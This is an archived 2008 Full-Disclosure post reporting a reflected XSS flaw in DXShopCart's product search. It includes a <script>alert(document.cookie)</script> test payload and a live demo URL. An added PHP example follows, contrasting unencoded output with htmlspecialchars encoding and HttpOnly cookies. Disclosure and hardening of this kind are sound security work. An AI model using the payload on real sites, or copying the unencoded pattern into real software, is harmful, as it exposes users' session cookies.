full-disclosure-uk August 2008 archive

[Full-disclosure] DXShopCart v4.30mc product search.php xss

From: bug squash <bugsquashr_at_nospam>
Date: Thu Aug 21 2008 - 17:24:19 GMT
To: full-disclosure@lists.grok.org.uk


###################################

DXShopCart V4.30mc search.php XSS
###################################

Author: d00m3d! Chik3n hUnT3r 666
email: bugsquashr@gmail.com

Example:
<script>alert(document.cookie)</script>

in the product search on http://www.scripts4profit.net/ShopCartDX/index.php

click submit

###################################



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
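
Added example, not part of the original post and not DXShopCart source code: the reflected-search pattern the post reports, shown beside an output-encoded form, using the test string from the post. The parameter name "keyword" and all function names are assumptions, since the page does not show how search.php handles the term.

```php
<?php
// Added illustration; NOT DXShopCart source. The parameter name "keyword"
// and the function names below are hypothetical.

// Vulnerable pattern: the search term is concatenated into HTML unchanged,
// so any markup inside the term is parsed by the browser.
function render_heading_unsafe(string $term): string
{
    return '<h2>Results for: ' . $term . '</h2>';
}

// Hardened pattern: encode for the HTML context at output time.
function render_heading_safe(string $term): string
{
    $encoded = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Results for: ' . $encoded . '</h2>';
}

// The same term written back into the search box needs the same encoding;
// ENT_QUOTES keeps it from closing the value="..." attribute.
function render_search_box_safe(string $term): string
{
    $encoded = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $encoded . '">';
}

// Test string taken from the post above. In a real handler the term would
// come from the request, e.g. $_GET['keyword'] ?? '' (name assumed).
$term = '<script>alert(document.cookie)</script>';

// Unencoded: the script element is emitted as markup.
echo render_heading_unsafe($term), PHP_EOL;

// Encoded: the angle brackets become entities and the term is shown as text.
echo render_heading_safe($term), PHP_EOL;
echo render_search_box_safe($term), PHP_EOL;

// The post's test string reads document.cookie. Marking the session cookie
// HttpOnly hides it from page script; this limits impact and does not
// replace output encoding. It must be set before session_start().
ini_set('session.cookie_httponly', '1');
```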